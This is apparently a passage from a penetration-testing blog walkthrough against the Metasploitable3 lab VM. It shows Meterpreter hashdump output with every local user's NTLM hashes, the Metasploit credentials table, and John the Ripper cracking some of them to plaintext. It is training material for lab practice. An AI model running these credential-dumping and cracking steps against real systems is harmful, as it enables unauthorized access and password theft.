boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9:::
chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8:::
c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee:::
darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0:::
greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76:::
jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4:::
kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001:::
lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f:::
leah_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028:::
luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
meterpreter > Ctrl+Z

Background session 2? [y/N]
msf exploit(winrm_script_exec) > sessions

That was very nice, we can see the NTLM hashes of all the local users. Now instead of using JtR directly from the Linux command line, I can, first use the post exploitation hashdump module to populate my creds table
Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x64/windows METASPLOITABLE3\Administrator @ METASPLOITABLE3 10.23.10.200:4444 -> 10.20.10.23:49312 (10.20.10.23)

msf exploit(winrm_script_exec) > use post/windows/gather/hashdump
msf post(hashdump) > options

Module options (post/windows/gather/hashdump):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.

msf post(hashdump) > run

[-] Session not found
[*] Post module execution completed
msf post(hashdump) > set SESSION 2
SESSION => 2
msf post(hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY af6e70a34bff69886e4fc480a73c573b...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
leah_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028:::
luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a:::
han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee:::
ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0:::
anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4:::
lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f:::
boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9:::
jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76:::
greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db:::
chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8:::
kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001:::

[*] Post module execution completed

Now all the NTLM hashes are in my creds table

msf post(hashdump) > creds
Credentials
===========

host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
10.20.10.23 10.20.10.23 8022/tcp (http) admin admin Password
10.20.10.23 10.20.10.23 445/tcp (smb) administrator aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) vagrant aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) sshd aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) sshd_server aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) leah_organa aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) luke_skywalker aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) han_solo aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) artoo_detoo aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) c_three_pio aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) ben_kenobi aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) darth_vader aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) anakin_skywalker aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) jarjar_binks aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) lando_calrissian aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) boba_fett aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) jabba_hutt aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) greedo aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) chewbacca aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8 NTLM hash
10.20.10.23 10.20.10.23 445/tcp (smb) kylo_ren aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001 NTLM hash

And then use the metasploit's JtR auxiliar module ( you can see all the JtR modules available)
msf post(hashdump) > use auxiliary/analyze/jtr_
use auxiliary/analyze/jtr_aix use auxiliary/analyze/jtr_mssql_fast use auxiliary/analyze/jtr_postgres_fast
use auxiliary/analyze/jtr_crack_fast use auxiliary/analyze/jtr_mysql_fast
use auxiliary/analyze/jtr_linux use auxiliary/analyze/jtr_oracle_fast
msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > options

Module options (auxiliary/analyze/jtr_crack_fast):

Name Current Setting Required Description
---- --------------- -------- -----------
CONFIG no The path to a John config file to use instead of the default
CUSTOM_WORDLIST no The path to an optional custom wordlist
ITERATION_TIMOUT no The max-run-time for each iteration of cracking
JOHN_PATH no The absolute path to the John the Ripper executable
KoreLogic false no Apply the KoreLogic rules to Wordlist Mode(slower)
MUTATE false no Apply common mutations to the Wordlist (SLOW)
POT no The path to a John POT file to use instead of the default
USE_CREDS true no Use existing credential data saved in the database
USE_DB_INFO true no Use looted database schema info to seed the wordlist
USE_DEFAULT_WORDLIST true no Use the default metasploit wordlist
USE_HOSTNAMES true no Seed the wordlist with hostnames from the workspace
USE_ROOT_WORDS true no Use the Common Root Words Wordlist

I setup my own pot file instead of the default because I used it on my last post.

msf auxiliary(jtr_crack_fast) > set POT metasploitable3/pot
POT => metasploitable3/pot

msf auxiliary(jtr_crack_fast) > run

[*] Wordlist file written out to /tmp/jtrtmp20170112-12024-1g0drpi

[*] Hashes Written out to /tmp/hashes_tmp20170112-12024-lwsn2l

[*] Cracking lm hashes in normal wordlist mode...

[*] Loaded 1 password hash (LM [DES 128/128 XOP-16])

Press 'q' or Ctrl-C to abort, almost any other key for status

0g 0:00:00:00 DONE (Thu Jan 12 22:13:17 2017) 0g/s 2573Kp/s 2573Kc/s 2573KC/s CLAIR..VAGRANT

Session completed

[*] Cracking lm hashes in single mode...

[*] Loaded 1 password hash (LM [DES 128/128 XOP-16])

Press 'q' or Ctrl-C to abort, almost any other key for status

0g 0:00:00:03 DONE (Thu Jan 12 22:13:20 2017) 0g/s 5300Kp/s 5300Kc/s 5300KC/s WU1900..E1900

Session completed

[*] Cracking lm hashes in incremental mode (All4)...

[*] Loaded 1 password hash (LM [DES 128/128 XOP-16])

fopen: /usr/share/john/all.chr: No such file or directory

[*] Cracking lm hashes in incremental mode (Digits)...

[*] Loaded 1 password hash (LM [DES 128/128 XOP-16])

Warning: MaxLen = 8 is too large for the current hash type, reduced to 7

Press 'q' or Ctrl-C to abort, almost any other key for status

0g 0:00:00:00 DONE (Thu Jan 12 22:13:21 2017) 0g/s 32679Kp/s 32679Kc/s 32679KC/s 0769790..0769743

Session completed

[*] Cracked Passwords this run:

[*] Cracking nt hashes in normal wordlist mode...

[*] Loaded 18 password hashes with no different salts (NT [MD4 128/128 XOP 4x2])

Press 'q' or Ctrl-C to abort, almost any other key for status

[*] vagrant (vagrant)

1g 0:00:00:00 DONE (Thu Jan 12 22:13:21 2017) 20.00g/s 1944Kp/s 1944Kc/s 33151KC/s e..vagrant

Warning: passwords printed above might not be all those cracked

Use the "--show" option to display all of the cracked passwords reliably

Session completed

[*] Cracking nt hashes in single mode...

[*] Loaded 18 password hashes with no different salts (NT [MD4 128/128 XOP 4x2])

[*] Remaining 17 password hashes with no different salts

Press 'q' or Ctrl-C to abort, almost any other key for status

[*] pr0t0c0l (c_three_pio)

1g 0:00:00:10 DONE (Thu Jan 12 22:13:32 2017) 0.09532g/s 7190Kp/s 7190Kc/s 116817KC/s p1900..vagrant1900

Warning: passwords printed above might not be all those cracked

Use the "--show" option to display all of the cracked passwords reliably

Session completed

[*] Cracking nt hashes in incremental mode (Digits)...

[*] Loaded 18 password hashes with no different salts (NT [MD4 128/128 XOP 4x2])

[*] Remaining 16 password hashes with no different salts

Press 'q' or Ctrl-C to abort, almost any other key for status

0g 0:00:00:04 DONE (Thu Jan 12 22:13:36 2017) 0g/s 24746Kp/s 24746Kc/s 395941KC/s 73673954..73673952

Session completed

[*] Cracked Passwords this run:

[+] c_three_pio:pr0t0c0l:12:12

[+] vagrant:vagrant:5:5

[+] administrator:vagrant:3:3

[+] vagrant:vagrant:5:5

[+] administrator:vagrant:3:3

[*] Auxiliary module execution completed

And now I have the clear text passowrds for those user's in my creds table in case I need them

msf auxiliary(jtr_crack_fast) > creds